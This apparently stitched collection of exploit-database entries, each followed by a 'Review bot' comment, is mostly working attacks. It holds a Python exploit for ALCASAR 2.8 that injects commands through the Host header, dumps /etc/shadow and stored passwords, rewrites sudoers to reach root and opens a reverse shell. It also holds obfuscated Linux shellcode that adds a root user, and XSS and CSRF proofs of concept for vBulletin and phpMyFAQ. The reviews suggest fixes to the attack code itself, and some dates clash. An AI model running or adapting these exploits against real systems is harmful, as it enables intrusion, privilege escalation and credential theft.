||||
# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a
|
||||
# trivial vulnerability. In the "index.php" file:
|
||||
#
|
||||
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
|
||||
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
|
||||
#
|
||||
# By sending a specially crafted value in the "host" HTTP header, it is possible
|
||||
# to inject the exec() function in order to execute commands as Apache user.
|
||||
#
|
||||
# In addition, the Apache user is able to call sudo for these binaries:
|
||||
#
|
||||
# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
|
||||
# /usr/local/bin/alcasar-conf.sh
|
||||
# /usr/local/sbin/alcasar-mysql.sh
|
||||
# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
|
||||
# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
|
||||
# /usr/local/bin/alcasar-archive.sh
|
||||
# /usr/bin/radwho,/usr/sbin/chilli_query
|
||||
# /usr/local/sbin/alcasar-logout.sh
|
||||
# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
|
||||
# /usr/bin/openssl
|
||||
#
|
||||
# As a result, we can use /usr/bin/openssl to read a file as root:
|
||||
#
|
||||
# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
|
||||
#
|
||||
# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.):
|
||||
#
|
||||
# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
|
||||
#
|
||||
# In this exploit, I choose to modify the "sudoers" file.
|
||||
#
|
||||
# Note: this vulnerability has been discovered in less than 30 seconds.
|
||||
# Others vulnerabilities are still present. This code has never been audited...
|
||||
# The PHP code is dreadful and needs to be rewritten from scratch.
|
||||
#
|
||||
# Example (post-auth) in file acc/admin/activity.php:
|
||||
#
|
||||
# if (isset($_POST['action'])){
|
||||
# switch ($_POST['action']){
|
||||
# case 'user_disconnect' :
|
||||
# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]");
|
||||
#
|
||||
#
|
||||
# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less.
|
||||
#
|
||||
#
|
||||
# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh"
|
||||
#
|
||||
# [+] Hello, first here are some passwords for you:
|
||||
# Password to protect the boot menu (GRUB) : cV9eEz1g
|
||||
# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
|
||||
# Name and password of Mysql/mariadb user : radius / oRNln64j
|
||||
# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
|
||||
# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
|
||||
#
|
||||
# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7:::
|
||||
#
|
||||
# [...]
|
||||
#
|
||||
# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
|
||||
#
|
||||
# username value
|
||||
# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H.
|
||||
#
|
||||
# [-] whoami (should be apache):
|
||||
# uid=495(apache) gid=492(apache) groups=492(apache)
|
||||
#
|
||||
# [+] On the way to the uid 0...
|
||||
# [-] Got root?
|
||||
# uid=0(root) gid=0(root) groups=0(root)
|
||||
#
|
||||
# [+] Your command Sir:
|
||||
# The Running version (2.8) is up to date
|
||||
#
|
||||
#
|
||||
####
|
||||
|
||||
import sys, os, re, httplib
|
||||
|
||||
class PWN_Alcasar:
|
||||
|
||||
def __init__(self, host):
|
||||
self.host = host
|
||||
self.root = False
|
||||
|
||||
def exec_cmd(self, cmd, output=False):
|
||||
tag = os.urandom(4).encode('hex')
|
||||
|
||||
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
|
||||
if self.root:
|
||||
cmd = 'sudo %s' % cmd
|
||||
|
||||
headers = {
|
||||
'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n',''))
|
||||
}
|
||||
|
||||
c = httplib.HTTPConnection(self.host)
|
||||
c.request('GET', '/index.php', '', headers)
|
||||
r = c.getresponse()
|
||||
data = r.read()
|
||||
c.close()
|
||||
|
||||
if data.find(tag) != -1:
|
||||
m = re.search(r'%s, (.*)\s</div>' % tag, data)
|
||||
if m:
|
||||
data = m.group(1).decode('base64')
|
||||
if output:
|
||||
print data
|
||||
return data
|
||||
return None
|
||||
|
||||
def read_file(self, filepath, output=True):
|
||||
return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output)
|
||||
|
||||
def read_passwords(self):
|
||||
self.read_file('/root/ALCASAR-passwords.txt')
|
||||
self.read_file('/etc/shadow')
|
||||
self.read_file('/usr/local/etc/digest/key_all')
|
||||
self.read_file('/usr/local/etc/digest/key_admin')
|
||||
self.read_file('/usr/local/etc/digest/key_backup')
|
||||
self.read_file('/usr/local/etc/digest/key_manager')
|
||||
self.read_file('/usr/local/etc/digest/key_only_admin')
|
||||
self.read_file('/usr/local/etc/digest/key_only_backup')
|
||||
self.read_file('/usr/local/etc/digest/key_only_manager')
|
||||
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
|
||||
if alcasar_mysql:
|
||||
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
|
||||
if m:
|
||||
radiuspwd = m.group(1)
|
||||
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
|
||||
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
|
||||
|
||||
def edit_sudoers(self):
|
||||
self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64')
|
||||
self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers')
|
||||
self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers')
|
||||
self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64')
|
||||
self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers')
|
||||
self.exec_cmd('sudo rm -f /tmp/sudoers*')
|
||||
self.root = True
|
||||
|
||||
def reverse_shell(self, rip, rport='80'):
|
||||
payload = 'import socket,subprocess,os;'
|
||||
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
|
||||
payload += 's.connect((\'%s\',%s));' % (rip, rport)
|
||||
payload += 'os.dup2(s.fileno(),0);'
|
||||
payload += 'os.dup2(s.fileno(),1);'
|
||||
payload += 'os.dup2(s.fileno(),2);'
|
||||
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
|
||||
return self.exec_cmd('python -c "%s"' % payload)
|
||||
|
||||
def usage():
|
||||
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
|
||||
print ' "command" can be a shell command or "reverseshell"'
|
||||
sys.exit(0)
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
usage()
|
||||
|
||||
cmd = sys.argv[2]
|
||||
if cmd == 'reverseshell':
|
||||
if len(sys.argv) < 5:
|
||||
print '[!] Need IP and port for the reverse shell...'
|
||||
sys.exit(0)
|
||||
rip = sys.argv[3]
|
||||
rport = sys.argv[4] # 80 is a good one...
|
||||
|
||||
exploit = PWN_Alcasar(sys.argv[1])
|
||||
print '[+] Hello, first here are some passwords for you:'
|
||||
exploit.read_passwords()
|
||||
print '[-] whoami (should be apache):'
|
||||
exploit.exec_cmd('id', output=True)
|
||||
print '[+] On the way to the uid 0...'
|
||||
exploit.edit_sudoers()
|
||||
print '[-] Got root?'
|
||||
exploit.exec_cmd('id', output=True)
|
||||
if cmd == 'reverseshell':
|
||||
print '[+] You should now have a shell on %s:%s' % (rip, rport)
|
||||
exploit.reverse_shell(rip, rport)
|
||||
else:
|
||||
print '[+] Your command Sir:'
|
||||
exploit.exec_cmd(cmd, output=True)
|
||||
sys.exit(1)
|
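Review bot: The script ends with `sys.exit(1)` after the successful path while `usage()` and the missing-IP/port branch exit with `sys.exit(0)`, so the process status is inverted for anything scripting around it; use `sys.exit(0)` at the end and `sys.exit(1)` for the two error paths. The code is Python 2 only (`print` statements, `httplib`, `str.encode('hex')` and `encode('base64')`) but the shebang is the generic `#!/usr/bin/env python`; `#!/usr/bin/env python2` would fail fast on hosts where `python` is Python 3. `edit_sudoers()` sets `self.root = True` unconditionally even though `exec_cmd()` returns `None` whenever the marker tag is absent from the response, so the later output is presented under a root claim that is never verified; a comment such as `# NOTE: root is assumed here, not verified` would at least make that explicit. The header comment describing the root cause (`$_SERVER['HTTP_HOST']` interpolated into `exec()`) could also name the fix for defenders: validate the host against a strict hostname pattern and pass it through `escapeshellarg()`.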
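--- a/platforms/linux/shellcode/34592.c
+++ b/platforms/linux/shellcode/34592.c
@@ -0,0 +1,209 @@
+/*
+#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
+#length: 521 bytes
+#Date: 8 September 2018
+#Author: Ali Razmjoo
+#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
+
+
+
+Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
+Thanks to Jonathan Salwan
+
+
+chmod('/etc/passwd',777)
+chmod('/etc/shadow',777)
+open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
+setreuid() , execve('/bin/sh')
+
+
+root@g3n3rall:~/Desktop/xpl# objdump -d f.o
+
+f.o: file format elf32-i386
+
+
+Disassembly of section .text:
+
+00000000 <_start>:
+0: 31 c0 xor %eax,%eax
+2: 31 db xor %ebx,%ebx
+4: 31 c9 xor %ecx,%ecx
+6: 31 d2 xor %edx,%edx
+8: bb 59 45 4f 53 mov $0x534f4559,%ebx
+d: ba 33 36 38 37 mov $0x37383633,%edx
+12: 31 d3 xor %edx,%ebx
+14: 53 push %ebx
+15: c1 eb 08 shr $0x8,%ebx
+18: 53 push %ebx
+19: bb 7a 46 59 45 mov $0x4559467a,%ebx
+1e: ba 55 36 38 36 mov $0x36383655,%edx
+23: 31 d3 xor %edx,%ebx
+25: 53 push %ebx
+26: bb 67 58 45 4e mov $0x4e455867,%ebx
+2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
+30: 31 d3 xor %edx,%ebx
+32: 53 push %ebx
+33: 89 e3 mov %esp,%ebx
+35: 68 41 41 ff 01 push $0x1ff4141
+3a: 59 pop %ecx
+3b: c1 e9 08 shr $0x8,%ecx
+3e: c1 e9 08 shr $0x8,%ecx
+41: 6a 0f push $0xf
+43: 58 pop %eax
+44: cd 80 int $0x80
+46: bb 53 49 57 4a mov $0x4a574953,%ebx
+4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
+50: 31 d3 xor %edx,%ebx
+52: c1 eb 08 shr $0x8,%ebx
+55: 53 push %ebx
+56: bb 6d 47 45 58 mov $0x5845476d,%ebx
+5b: ba 42 34 2d 39 mov $0x392d3442,%edx
+60: 31 d3 xor %edx,%ebx
+62: 53 push %ebx
+63: bb 6e 54 49 57 mov $0x5749546e,%ebx
+68: ba 41 31 3d 34 mov $0x343d3141,%edx
+6d: 31 d3 xor %edx,%ebx
+6f: 53 push %ebx
+70: 89 e3 mov %esp,%ebx
+72: 68 41 41 ff 01 push $0x1ff4141
+77: 59 pop %ecx
+78: c1 e9 08 shr $0x8,%ecx
+7b: c1 e9 08 shr $0x8,%ecx
+7e: 6a 0f push $0xf
+80: 58 pop %eax
+81: cd 80 int $0x80
+83: bb 73 47 4e 51 mov $0x514e4773,%ebx
+88: ba 32 34 39 35 mov $0x35393432,%edx
+8d: 31 d3 xor %edx,%ebx
+8f: c1 eb 08 shr $0x8,%ebx
+92: 53 push %ebx
+93: bb 59 44 56 44 mov $0x44564459,%ebx
+98: ba 76 34 37 37 mov $0x37373476,%edx
+9d: 31 d3 xor %edx,%ebx
+9f: 53 push %ebx
+a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
+a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
+aa: 31 d3 xor %edx,%ebx
+ac: 53 push %ebx
+ad: 89 e3 mov %esp,%ebx
+af: 68 41 41 01 04 push $0x4014141
+b4: 59 pop %ecx
+b5: c1 e9 08 shr $0x8,%ecx
+b8: c1 e9 08 shr $0x8,%ecx
+bb: 6a 05 push $0x5
+bd: 58 pop %eax
+be: cd 80 int $0x80
+c0: 89 c3 mov %eax,%ebx
+c2: 6a 04 push $0x4
+c4: 58 pop %eax
+c5: 68 41 73 68 0a push $0xa687341
+ca: 59 pop %ecx
+cb: c1 e9 08 shr $0x8,%ecx
+ce: 51 push %ecx
+cf: b9 57 67 57 58 mov $0x58576757,%ecx
+d4: ba 39 48 35 39 mov $0x39354839,%edx
+d9: 31 d1 xor %edx,%ecx
+db: 51 push %ecx
+dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
+e1: ba 74 4b 38 38 mov $0x38384b74,%edx
+e6: 31 d1 xor %edx,%ecx
+e8: 51 push %ecx
+e9: b9 47 57 56 42 mov $0x42565747,%ecx
+ee: ba 35 38 39 36 mov $0x36393835,%edx
+f3: 31 d1 xor %edx,%ecx
+f5: 51 push %ecx
+f6: b9 61 70 51 4e mov $0x4e517061,%ecx
+fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
+100: 31 d1 xor %edx,%ecx
+102: 51 push %ecx
+103: b9 48 58 70 74 mov $0x74705848,%ecx
+108: ba 72 68 4a 35 mov $0x354a6872,%edx
+10d: 31 d1 xor %edx,%ecx
+10f: 51 push %ecx
+110: b9 76 45 56 46 mov $0x46564576,%ecx
+115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
+11a: 31 d1 xor %edx,%ecx
+11c: 51 push %ecx
+11d: 68 66 77 55 57 push $0x57557766
+122: 68 68 70 31 50 push $0x50317068
+127: 68 7a 59 65 41 push $0x4165597a
+12c: 68 41 61 41 51 push $0x51416141
+131: 68 49 38 75 74 push $0x74753849
+136: 68 50 4d 59 68 push $0x68594d50
+13b: 68 54 42 74 7a push $0x7a744254
+140: 68 51 2f 38 54 push $0x54382f51
+145: 68 45 36 6d 67 push $0x676d3645
+14a: 68 76 50 2e 73 push $0x732e5076
+14f: 68 4e 58 52 37 push $0x3752584e
+154: 68 39 4b 55 48 push $0x48554b39
+159: 68 72 2f 59 42 push $0x42592f72
+15e: 68 56 78 4b 47 push $0x474b7856
+163: 68 39 55 66 5a push $0x5a665539
+168: 68 46 56 6a 68 push $0x686a5646
+16d: 68 46 63 38 79 push $0x79386346
+172: 68 70 59 6a 71 push $0x716a5970
+177: 68 77 69 53 68 push $0x68536977
+17c: 68 6e 54 67 54 push $0x5467546e
+181: 68 58 4d 69 37 push $0x37694d58
+186: 68 2f 41 6e 24 push $0x246e412f
+18b: 68 70 55 6e 4d push $0x4d6e5570
+190: 68 24 36 24 6a push $0x6a243624
+195: b9 73 61 74 67 mov $0x67746173,%ecx
+19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
+19f: 31 d1 xor %edx,%ecx
+1a1: 51 push %ecx
+1a2: 89 e1 mov %esp,%ecx
+1a4: ba 41 41 41 7f mov $0x7f414141,%edx
+1a9: c1 ea 08 shr $0x8,%edx
+1ac: c1 ea 08 shr $0x8,%edx
+1af: c1 ea 08 shr $0x8,%edx
+1b2: cd 80 int $0x80
+1b4: 31 c0 xor %eax,%eax
+1b6: b0 46 mov $0x46,%al
+1b8: 31 db xor %ebx,%ebx
+1ba: 31 c9 xor %ecx,%ecx
+1bc: cd 80 int $0x80
+1be: 31 c0 xor %eax,%eax
+1c0: b0 46 mov $0x46,%al
+1c2: 31 db xor %ebx,%ebx
+1c4: 31 c9 xor %ecx,%ecx
+1c6: cd 80 int $0x80
+1c8: 68 52 55 48 42 push $0x42485552
+1cd: 68 52 51 49 43 push $0x43495152
+1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
+1d7: ba 66 38 31 35 mov $0x35313866,%edx
+1dc: 31 d1 xor %edx,%ecx
+1de: 51 push %ecx
+1df: b9 55 55 54 57 mov $0x57545555,%ecx
+1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
+1e9: 31 d1 xor %edx,%ecx
+1eb: 51 push %ecx
+1ec: 89 e3 mov %esp,%ebx
+1ee: 31 c0 xor %eax,%eax
+1f0: 88 43 07 mov %al,0x7(%ebx)
+1f3: 89 5b 08 mov %ebx,0x8(%ebx)
+1f6: 89 43 0c mov %eax,0xc(%ebx)
+1f9: b0 0b mov $0xb,%al
+1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
+1fe: 8d 53 0c lea 0xc(%ebx),%edx
+201: cd 80 int $0x80
+203: b0 01 mov $0x1,%al
+205: b3 01 mov $0x1,%bl
+207: cd 80 int $0x80
+root@g3n3rall:~/Desktop/xpl#
+
+
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
+int main(void)
+{
+
+fprintf(stdout,"Length: %d\n\n",strlen(sc));
+
+(*(void(*)()) sc)();
+
+}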
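Review bot: `fprintf(stdout,"Length: %d\n\n",strlen(sc));` passes a `size_t` to `%d`, which is undefined behaviour on the printf contract and prints garbage on ABIs where the two differ; the matching line is `fprintf(stdout, "Length: %zu\n\n", strlen(sc));`. The header's `#Date: 8 September 2018` does not fit a file tested on kali-linux 1.0.4 and landing in this 2014 commit, so it looks like a typo and should be corrected. Nothing documents the build assumptions of the harness: `sc` is a writable global, so with a default NX-enabled toolchain the indirect call `(*(void(*)()) sc)();` faults rather than runs, and a one-line comment stating that data/stack execution must be enabled for this test build would save the next reader a puzzled debugging session. The header also describes the decoded payload as appending to /etc/passwd and chmod'ing /etc/passwd and /etc/shadow, so the comment block should state plainly that running the harness modifies the host it runs on, i.e. it is only meaningful inside a disposable VM.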
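--- a/platforms/php/webapps/34579.txt
+++ b/platforms/php/webapps/34579.txt
@@ -0,0 +1,118 @@
+#Title: vBulletin 5.1.X - Cross Site Scripting
+#Date: 05.09.14
+#Version: => 5.1.2 (Latest ATM)
+#Vendor: vbulletin.com
+#Contact: smash [at] devilteam.pl
+
+
+1) Agenda
+
+Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it.
+
+Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.
+
+
+2) Vulnerability
+
+First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim.
+
+Let's take as example following address:
+http://vbulletin/member/2-victim
+
+1. Click 'Share photo' (camera icon), pick any image you like.
+
+2. You may add comment about photo, all you need to do is to add js payload.
+
+As comment, use something like - huh" onmouseover=alert(666) xss="
+
+Request:
+POST /ajax/render/editor_gallery_photoblock HTTP/1.1
+Host: vbulletin
+
+photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]
+
+3. Send image by clicking on 'Post' button.
+
+Request:
+POST /create-content/gallery HTTP/1.1
+Host: vbulletin
+Content-Type: multipart/form-data;
+boundary=---------------------------18897880557155952661558219659
+Content-Length: 1558
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+
+1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="text"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="filedataid[]"
+
+13
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="title_13"
+
+cool" onmouseover=alert(666) xssed="
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+
+[TOKEN]
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="parentid"
+
+8
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="setfor"
+
+5
+-----------------------------18897880557155952661558219659--
+
+4. Done
+
+At this point, victim should be noticed about new activity via 'Messages' tab:
+"attacker has left you a visitor message"
+
+Basically, you may use this XSS against any profile.
+
+Now, whenever someone will visit profile of victim (ie. http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image.
+
+When victim will click on image, js will be executed, and popup will appear.
+
+Request:
+GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1
+Host: vbulletin
+
+Response:
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=UTF-8
+
+{"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By <a href=\"vbulletin\/member\/2-victim\">victim.victim@tlen.pl<\/a> in <a href=\"javascript:$('#slideshow-dialog').dialog('close');void(0);\">No Title<\/a><br \/>\n"}]}
+
+
+3) TL;DR
+
+- Visit victim profile
+- Upload any image
+- XSS in title (asdf" onmouseover=alert(666) xss=")
+- Send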
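Review bot: The 'Solution' line recommends input filtering of the `title_13` value, but the evidence at the end of the advisory points at the wrong layer: the `/filedata/gallery` response returns the stored title with correct JSON escaping (`"cool\" onmouseover=...`), and the payload only fires because that string is later placed into an HTML attribute without attribute encoding, presumably by the client-side gallery code (inferred, not shown). The durable fix is contextual output encoding at that render point, with a Content-Security-Policy as a second layer, so I would reword the line to `Solution - encode the photo title for the HTML attribute context where the gallery block is rendered; filtering the title_13 input alone is not sufficient.` The text also says the victim "need to click on image" while the handler is `onmouseover`, which fires on hover; one of the two statements should be corrected. The `#Title` omits the 'Persistent' qualifier that the Agenda section itself uses.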
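--- a/platforms/php/webapps/34580.txt
+++ b/platforms/php/webapps/34580.txt
@@ -0,0 +1,207 @@
+#Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities
+#Vendor: phpmyfaq.de
+#Date: 04.09.19
+#Version: >= 2.8.12 (Latest ATM)
+#Tested on: Apache 2.2 / PHP 5.4 / Linux
+#Contact: smash [at] devilteam.pl
+
+
+1) Persistent XSS
+
+Administrator is able to view information about specific user session in 'Statistic' tab. Over there, you may find informations such as user ip, refferer and user agent.
+
+For example, to view informations about session with ID 1, you need visit following address:
+http://localhost/phpmyfaq/admin/?action=viewsession&id=1
+
+Refferer and User Agent variables are not filtered, which allows attacker to inject javascript via those parameters. All you need to do, is to perform particular HTTP request which will contain javascript. For example, if you will produce hundrends of those request, there will be hundrends of Persistent XSS - Victim only needs to visit any of them.
+
+PoC:
+
+<?php
+
+$ch =curl_init("http://localhost/phpmyfaq/index.php");
+curl_setopt($ch,CURLOPT_USERAGENT,'<script>alert(666)</script>');
+curl_setopt($ch, CURLOPT_REFERER, '<script>alert(123)</script>');
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Vuln (viewsession):
+
+<tbody>
+<tr>
+<td>2014-09-04 02:22:04</td>
+<td>new_session (0)</td>
+</tr>
+<tr>
+<td>Referer:</td>
+<td>
+<a href="<script>alert(123)</script>" target="_blank">
+<script>alert(123)</script> </a>
+</td>
+</tr>
+<tr>
+<td>Browser:</td>
+<td><script>alert(666)</script></td>
+</tr>
+<tr>
+<td>IP-Address:</td>
+<td>::1</td>
+</tr>
+</tbody>
+
+
+
+2) Remote FAQ Disclosure
+
+Administrator is able to view or download FAQ data using few extensions (xhtml, xml, pdf). Because of no user restrictions, attacker may reproduce this vulnerability to perform those actions even without having an account.
+
+- Download
+
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
+<input type="hidden" name="catid" value="0" />
+<input type="hidden" name="downwards" value="1" />
+<input type="hidden" name="type" value="xml" />
+<input type="hidden" name="dispos" value="attachment" />
+<input type="hidden" name="submitExport" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+- View
+
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
+<input type="hidden" name="catid" value="0" />
+<input type="hidden" name="downwards" value="1" />
+<input type="hidden" name="type" value="xml" />
+<input type="hidden" name="dispos" value="inline" />
+<input type="hidden" name="submitExport" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+
+3) CSRF
+
+- Edit user credentials (login/mail)
+
+PoC:
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=user&user_action=update_data" method="POST">
+<input type="hidden" name="user_id" value="1" />
+<input type="hidden" name="user_status" value="active" />
+<input type="hidden" name="display_name" value="haked" />
+<input type="hidden" name="email" value="victim@vic.tim" />
+<input type="hidden" name="last_modified" value="undefined" />
+<input type="submit" value="Go" />
+</form>
+</body>
+</html>
+
+By then, you may generate new password for victim using 'Forgot password' option - just provide your email so you can grab it.
+
+
+- Delete user
+
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=user&ajaxaction=delete_user&user_id=1
+
+
+- Delete category
+
+http://localhost/phpmyfaq/admin/?action=deletecategory&cat=1&catlang=en
+
+
+- Delete session (month)
+
+PoC:
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=viewsessions" method="POST">
+<input type="hidden" name="month" value="092014" />
+<input type="hidden" name="statdelete" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+- Delete logs older than 30 days
+
+http://localhost/phpmyfaq/admin/?action=deleteadminlog
+
+
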